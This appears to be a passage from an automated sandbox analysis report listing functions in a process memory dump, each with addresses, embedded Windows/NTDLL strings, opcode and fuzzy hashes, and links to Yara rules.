Instruction Fuzzy Hash: 1531083290050ABFEB1DDA58C985EEBBB74FB40720F024129E924A7280E7309E14C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0116D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 0116D303

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 909d650da1a2bafe78108c2fb7145605babdc1ceaef1249a230ff3bcfd1e3d2a
Instruction ID: a83cb69eaf370a72ac415c07a15a03b63c2f59c0683f0ee338ed029e297c75c3
Opcode Fuzzy Hash: 909d650da1a2bafe78108c2fb7145605babdc1ceaef1249a230ff3bcfd1e3d2a
Instruction Fuzzy Hash: D131ACB560C3059FCB29DF68E98096BBBECEB89654F01092EF99483250D735DD14CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01141B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 01141BC5

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: b14f4fc01299f347c9c2d425f89fa60061b2827d15de1e6f8cffeeb2a4f5e759
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 1D21F876900119BBDF2A9A59DC40F9B7B7DAF41A50F0A4425FE148B200D730ED50CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0115F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 0115F73F

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 463a95b131a93d17781a6d142f32b61dabdfae5f968f354a1888e615a142e940
Instruction ID: f0f986fb19de4369a9cd932f29ce1e63ad69bcf2f72111653d7585eb91b21738
Opcode Fuzzy Hash: 463a95b131a93d17781a6d142f32b61dabdfae5f968f354a1888e615a142e940
Instruction Fuzzy Hash: 3911B635344E43CBE7AD4E1D85947367A96EB85624F26453AED72CB391D7B0C8438342

Uniqueness

Uniqueness Score: -1.00%

Function 011E8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Critical error detected %lx, xrefs: 011E8E21

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 3fdc67752a59f61a968247b0e38a937defcc20113a6edc02c7ebe90a5587e836
Instruction ID: e7c5be6b52c93312fb86781f238c752c442145984e38a652003c74791a697481
Opcode Fuzzy Hash: 3fdc67752a59f61a968247b0e38a937defcc20113a6edc02c7ebe90a5587e836
Instruction Fuzzy Hash: 3A112371D14758DADF29DFE89909B9CBBB0AB14714F20825EE529AB282C3340602CF14

Uniqueness

Uniqueness Score: -1.00%

Function 011CFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 011CFF60

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 17f3c9b061aabcc1547475b3c81d84525e36acf13ffd964e3321f278926c7049
Instruction ID: 179ddb71693a1e72c75d261e888eca2f87c6550d9145f2f0654a6a7364417163
Opcode Fuzzy Hash: 17f3c9b061aabcc1547475b3c81d84525e36acf13ffd964e3321f278926c7049
Instruction Fuzzy Hash: 2E110472510246EFDF2AEF94C849F9C7BB2FF28B18F148048F104571A1C7399941DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01205BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ffc7c02a1968ebfe496d8014139ec796edac666c9472e63e91c164932a467d1
Instruction ID: 8e366bfc79fa13117f0c064f94cf051a2b321acbb1ddc208522e0366bb804367
Opcode Fuzzy Hash: 8ffc7c02a1968ebfe496d8014139ec796edac666c9472e63e91c164932a467d1
Instruction Fuzzy Hash: 1C426E7191022ACFDB25CF68C880BA9BBB1FF45304F1482AAD94DEB382D7749995CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01154120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcd3972131211bf0db344c528f290f0c85aee86c016e9eace7b1bbf849d42ebf
Instruction ID: 56ae65cc4b19c0de63b7576a5c80a186a4cd82d251594cfe2b3ec10fd6537683
Opcode Fuzzy Hash: bcd3972131211bf0db344c528f290f0c85aee86c016e9eace7b1bbf849d42ebf
Instruction Fuzzy Hash: 0BF17B70608211CFDB6CCF18C480A7ABBE1EF88754F15492EF9AACB651E734D881CB52

Uniqueness

Uniqueness Score: -1.00%

Function 011620A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc92273b139e00666b2ad054aeb24298ee2a27262938f2263c316bdfdc6c55dd
Instruction ID: a06c4c1008f79c30d04b94682d03a928fd8c9f2fd3549712b21b49cd974612df
Opcode Fuzzy Hash: fc92273b139e00666b2ad054aeb24298ee2a27262938f2263c316bdfdc6c55dd
Instruction Fuzzy Hash: 20F1F235A0C341DFD76ECF2CC840B6A7BEAAF85324F05851DE9959B281E736D851CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0114D5E0, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdbd90a13dbfda2bb03ebf84482cad66dc6cd32d842fa0f115773c095db047cb
Instruction ID: 344d2946c1db6d9e9ed91b732ffce59a713e2686078e093759b0641174858fc2
Opcode Fuzzy Hash: cdbd90a13dbfda2bb03ebf84482cad66dc6cd32d842fa0f115773c095db047cb
Instruction Fuzzy Hash: 51E10330A0475ACFEF3CCF68E884BA9B7B2BF55B08F050199D91997291D730AD81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0114849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eb8bd3931582108763044ae8696c96355a1368e9b88c90dcf05d0ab3682988c
Instruction ID: 789bc5b90c2463d2b18c4a60dc1809890d343b94b3404b83cf004e8c4fa62a76
Opcode Fuzzy Hash: 5eb8bd3931582108763044ae8696c96355a1368e9b88c90dcf05d0ab3682988c
Instruction Fuzzy Hash: 24B179B0E0020ADFDB2DDFE8D984AADBBB9FF48708F144129E515AB345D774A841CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0116513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f8fea468c70462816c82e8fdfe324bda7448c0b27236462126f77c5aa50206a
Instruction ID: 5bc5b75af7505dd9f2a8851f74c97369e0604e92cce13b2641edc51dd5fc2d02
Opcode Fuzzy Hash: 1f8fea468c70462816c82e8fdfe324bda7448c0b27236462126f77c5aa50206a
Instruction Fuzzy Hash: 34C10175508381CFD359CF28C580A5ABBF2BF88304F58496EF9998B352D771E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 011603E2, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf6af360d5f7a900f1f366d756c37e59ffe4f47417d68b7fdecf5fb9be925b38
Instruction ID: e3dc69a44cb5d744b914e2178edd747a04238de3d2ef43806a9910717040a220
Opcode Fuzzy Hash: cf6af360d5f7a900f1f366d756c37e59ffe4f47417d68b7fdecf5fb9be925b38
Instruction Fuzzy Hash: 38913635E04215AFEB3D9B6CC848BAD7FA8AF14728F190261FA10AB6D1D7B49D50C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 0113C600, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e278fe8494ee8570eecdd6ffef9b8e02054c423abb0229669d7d19990e308618
Instruction ID: 7c7b9a5c2e2f023c380ed054d14f6a154a348eb81224ad7199abab1d0d0461ff
Opcode Fuzzy Hash: e278fe8494ee8570eecdd6ffef9b8e02054c423abb0229669d7d19990e308618
Instruction Fuzzy Hash: EF81A7B96043019FDB2ECE58C490A7B7BE4EF84364F59481AEE459B381E332DE41C792

Uniqueness

Uniqueness Score: -1.00%

Function 011CB8D0, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 821c943d7259a170baf4d1f33efd1b78df681e23f848415cc11edc5860a4b23b
Instruction ID: 886bf50588852d4c2e8a509a7360970e0b411ce18dd65eef0e3830d137fc3e50
Opcode Fuzzy Hash: 821c943d7259a170baf4d1f33efd1b78df681e23f848415cc11edc5860a4b23b
Instruction Fuzzy Hash: EA713272204B02EFE73ACF18C846F56BBB5EB60BA4F11452CE655C76A0EB71E940CB44

Uniqueness

Uniqueness Score: -1.00%

Function 011B6DC9, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 2604647ce4cbbe643d26bd2cfba11568bd47dd4163dc5f6cd1e3dcfceddbf780
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 54717071A00619EFDB15DFA8C984EEEBBB9FF58714F104069E905E7290E734AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 011352A5, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6528749804b9a46281eace5b0b2ddff72dca2ae1a07da68d521d4f973b670a5e
Instruction ID: 4e5aca7a8627983584669700993b772d64661c8e68e6db332bf691f2cb084f1d
Opcode Fuzzy Hash: 6528749804b9a46281eace5b0b2ddff72dca2ae1a07da68d521d4f973b670a5e
Instruction Fuzzy Hash: AD51FF30205742EBD729DF68C840B2BBBE9FFA4B18F14091EF4A583651E774E844C792

Uniqueness

Uniqueness Score: -1.00%

Function 01162AE4, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9023c36ebef0645e3475ab1a128cfa96bcb2d860696624962906a090a0e44317
Instruction ID: 7fd26a08051454c5e70c315d766a1170833cafe645ab19739a8dc303e94f7978
Opcode Fuzzy Hash: 9023c36ebef0645e3475ab1a128cfa96bcb2d860696624962906a090a0e44317
Instruction Fuzzy Hash: 3151E376B00125DFCB2CCF1CC4909BDB7F5FB89700706855AE846AB319D736AA61CB91

Uniqueness

Uniqueness Score: -1.00%

Function 011FAE44, Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2da2a99e2ecd3ac5e28e14ed80c5939cf4143343e4b487903ba20ac84224b1a
Instruction ID: 34a64ce4a8dc4aca12185fa770b3044d9f696e0089dfc627074180f97d2a453e
Opcode Fuzzy Hash: f2da2a99e2ecd3ac5e28e14ed80c5939cf4143343e4b487903ba20ac84224b1a
Instruction Fuzzy Hash: AF41E8717006115BD72ECE29E894B7FBB99EF94650F04821DFB1E8B2D1D778D801C692

Uniqueness

Uniqueness Score: -1.00%

Function 0115DBE9, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e380ef98c74ab2805240c33a790d08d29b159873adde7d106844f2793d4f0b
Instruction ID: bd7a013da465e5ddba50069ec3359b8837e321a7d1d59f09d0841c879233b470
Opcode Fuzzy Hash: 73e380ef98c74ab2805240c33a790d08d29b159873adde7d106844f2793d4f0b
Instruction Fuzzy Hash: B751C375A00216DFCF68CFA8D4906AEFBF1BF48310F21815AD965E7344DB70A944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0114EF40, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: b9f72e9581cc369edfdb8a0774a9a3e8e69a810bd1c0ce8242f77c3056dd1fbf
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: F9510730E0524ADFDB2DCB6CC0D47AEBBB2BF45714F1481A8C55557382C379A98AC742

Uniqueness

Uniqueness Score: -1.00%

Function 0120740D, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: d9600299d6cf80e8c663c49dde5cfb7a0518ac7afcea1baea1766a249005c9a5
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 8751A071610646EFDB16CF18D480A96BBF5FF45304F15C1BAEA089F252E372E946CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01162990, Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a87593a93e07daa37263fb9a0e7802265ce1c4bf218db6a08dcdc998978276c6
Instruction ID: 82901b239d51a6410bfb19070a5c3ca3bc8ce35e056e01ad6203020be86ec0ae
Opcode Fuzzy Hash: a87593a93e07daa37263fb9a0e7802265ce1c4bf218db6a08dcdc998978276c6
Instruction Fuzzy Hash: CB519E71A0021ADFDF2DDF58C840AEEBBBABF48314F118115E900AB254D3728D62CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01164BAD, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65a21b0220f27da9d2b197d96d52ccc2bdb551bbef729df47082428a0889d2b0
Instruction ID: 59ed908ccc41ad23bcc4c94034979e0fb44182ed966852ef1a11a53d5c2430c8
Opcode Fuzzy Hash: 65a21b0220f27da9d2b197d96d52ccc2bdb551bbef729df47082428a0889d2b0
Instruction Fuzzy Hash: 9341D535A00629DBCB29DF68C940BEA7BB8EF45700F4500A5E908AB741DB34DE84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 01164D3B, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfc48a5438fb34416cecca5e84eed0a5f1b9cadf446ecead632dc56db13bfbdb
Instruction ID: ad52dd177c7327fe4ba0742fad4fdc6b6ad97cf24357ee4b7a6817b86e50e881
Opcode Fuzzy Hash: dfc48a5438fb34416cecca5e84eed0a5f1b9cadf446ecead632dc56db13bfbdb
Instruction Fuzzy Hash: C6412871A44318AFEB3ADF18CC80FAABBBAEB54714F04009AED0597681D775DD50CB92

Uniqueness

Uniqueness Score: -1.00%

Function 011FAA16, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 2b14883cff4b3846e6a00a486abf6e021a4ff6ddad2e1c9325571a0d34621b97
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: 1731E432F001096BEB1D8B69DC45BAFFBBAEF84210F05846DEA19A7291DB78DD04C750

Uniqueness

Uniqueness Score: -1.00%

Function 01148A0A, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa12e30f806b5089ab59109d8f57937d1f92835476385661ce20914970df6341
Instruction ID: d345e36ece42628a5bb5b1df9d04f6a4e205b6e8abf486feb652b7dd18853feb
Opcode Fuzzy Hash: fa12e30f806b5089ab59109d8f57937d1f92835476385661ce20914970df6341
Instruction Fuzzy Hash: F74171B4A0022D9FDB28DF99CC88AA9B7F4FB54704F1145EAD91997242E7709E80CF60

Uniqueness

Uniqueness Score: -1.00%

Function 011FFDE2, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: f59df216b2f9f2ff10317fbea6f902781033ab1d61321e32e176a1c9c8d58c57
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: EC311633200642AFD72E8B68C844F6A7BA9EF85650F19415CEB4A8B342DBF4DC42C761

Uniqueness

Uniqueness Score: -1.00%

Function 011FEA55, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: d69052551c1a05a50878be56853289225d2fb84d7f66bb8ac573dbaf40a1b32a
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 2931C1726057069BC71DDF28C880A6BB7AAFFC0214F05492DFA5687751DB34E809CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 011B69A6, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 328cf582285b024b590e6d855832f9818c9e4757975569b5d2ad660d068ade2e
Instruction ID: fc33fdb7c351ae723c9fa2e8ecae30f8d309eac192172d21652c56e4aedddf6a
Opcode Fuzzy Hash: 328cf582285b024b590e6d855832f9818c9e4757975569b5d2ad660d068ade2e
Instruction Fuzzy Hash: 1D4160B1D00209AFDB28DFB9D980BFEBBF4EF58718F14812AE914A7250DB749905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01135210, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fe6909753b67ed1d5f7bf51d26ff12959e7dfb83bfa2ef00bf9a14f9bf722a9
Instruction ID: 6540a1fe1dbf8c6c707fcfb2b1acdde3a043616c2812a9c06c4dfc1b51c73ae9
Opcode Fuzzy Hash: 3fe6909753b67ed1d5f7bf51d26ff12959e7dfb83bfa2ef00bf9a14f9bf722a9
Instruction Fuzzy Hash: 82314B31241A11EFCB6E9F18C881F2E7BBAFF64B64F11461AF8254B295DB30E800C791

Uniqueness

Uniqueness Score: -1.00%

Function 01173D43, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a7ead52687476121b92ae8a0d28e2f2de5afe96e5bc58cde06de242a43a79b4
Instruction ID: 32895afd6e26223945e9d67e3b89f2e60949b97d60c4c9516fee3c243ff0429f
Opcode Fuzzy Hash: 1a7ead52687476121b92ae8a0d28e2f2de5afe96e5bc58cde06de242a43a79b4
Instruction Fuzzy Hash: E731FE31611625DBC72D8F2DC841A2ABFF1FF45700B46846AE969CB350EB30C840D791

Uniqueness

Uniqueness Score: -1.00%

Function 0116A61C, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a1946273026fa86d6a2714f23a2d5f848064f34b1884a4ad77a78df64a1fc9
Instruction ID: a58f473518117d1a24cafa66a45317c18c573f3f8c5fcba42acfd57307272872
Opcode Fuzzy Hash: 97a1946273026fa86d6a2714f23a2d5f848064f34b1884a4ad77a78df64a1fc9
Instruction Fuzzy Hash: E8417BB9A04209DFCB18CF58E490B9DBBF5BF89304F158069E905AB344D779AD41CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0115C182, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: cfadbc3dda8576b59e278b2491780ea416ede99d18d32665224ad8c61976f976
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 4B310572A0164BEBD74DEBB8C480BE9FB58BF62248F04415AD82C47301DB345A46C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 011B7016, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35e73f6d5c802d34cd5c639e12df683a91b426f4720199c4d1fe42a7be98f051
Instruction ID: 5a8919db0f99492628c229b1927c8e5f0dc164da157fe29e56ac64b18bd55085
Opcode Fuzzy Hash: 35e73f6d5c802d34cd5c639e12df683a91b426f4720199c4d1fe42a7be98f051
Instruction Fuzzy Hash: 3331C4726047519BC329DF28C981AAAB7F5FFC8700F044A29F995877D0E730E904C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 011E3D40, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e85212df5bbbf7022c70ffd7957c5adcbcc6f9c622cda737ed165d283bc99761
Instruction ID: a64393aa2b56065274e6ba2f69378882f610e15663ee569d0c9b034c337b0c02
Opcode Fuzzy Hash: e85212df5bbbf7022c70ffd7957c5adcbcc6f9c622cda737ed165d283bc99761
Instruction Fuzzy Hash: BF319971519722DFCB28DF58D48985ABBE1FF85714F44896EE8A88B341D730DD04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0116A70E, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09c738b23652202022370f4a35295caa2a19288af57d943d4893c837909ad8f5
Instruction ID: e663754efa834e740809b738dc617af2caf689c9b26edeb38d05e6c4fd4a8e2e
Opcode Fuzzy Hash: 09c738b23652202022370f4a35295caa2a19288af57d943d4893c837909ad8f5
Instruction Fuzzy Hash: 8F31D0B1608605EFC739CF08F884F2D7BF9FBA4710F15095AE215A7254E376A911CB92

Uniqueness

Uniqueness Score: -1.00%

Function 011661A0, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11bea272f60dbf9cda48c5a92d66e3d36682e0af7ba67fe753226cd5f6f38f4f
Instruction ID: 686216c88210bf13ff27b09e5b583b68ebaef4ded561dd3c3b6c8224bd7b2962
Opcode Fuzzy Hash: 11bea272f60dbf9cda48c5a92d66e3d36682e0af7ba67fe753226cd5f6f38f4f
Instruction Fuzzy Hash: FB31AE71605701CFE328CF1DC800B26BBE9FB98B04F45496DE99897391E7B2D944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0113AA16, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31492d73b8be98daacd7961ef5faea6d63068ee40da190ca9c7842b5c74fee23
Instruction ID: b3bf1585711dd24d798ca450adec7667517f8953c8a77377c907bb45717cfff8
Opcode Fuzzy Hash: 31492d73b8be98daacd7961ef5faea6d63068ee40da190ca9c7842b5c74fee23
Instruction Fuzzy Hash: FA312572A0021AEBCF199F68CD41A7FB7B8EF44704F014069F911EB254E7349912CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01174A2C, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24b5146003424d03fe2e07914f67e79ae69f09795b81367a1fbce73e1b45e17c
Instruction ID: 50bb2395dc675922e251d0177f407121f88d696c58c6ec9dd73ba7713aa93e11
Opcode Fuzzy Hash: 24b5146003424d03fe2e07914f67e79ae69f09795b81367a1fbce73e1b45e17c
Instruction Fuzzy Hash: DF31FF36245312EFD73AEF58C944B2ABBF5FB80B14F410429E8660BB41C7B0D800CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 01178EC7, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77066acf7c18f7be7dcf61b35c264d4dcc11abc8f6da06f4e9e0e1c29d58d0b8
Instruction ID: fdab5f90bcd4d4d62e973756c0b3e7bdfb52dce6fd7fd976a390661b5e688643
Opcode Fuzzy Hash: 77066acf7c18f7be7dcf61b35c264d4dcc11abc8f6da06f4e9e0e1c29d58d0b8
Instruction Fuzzy Hash: 3D4182B1D00218AEDB24CFAAD981AEDFBF4FB48710F5081AEE509A7640D7745A44CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0116E730, Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4875f5479962ca7b0c99b9af3a41a8fd1e8f0ea3d5565bcff8679c0643f112d
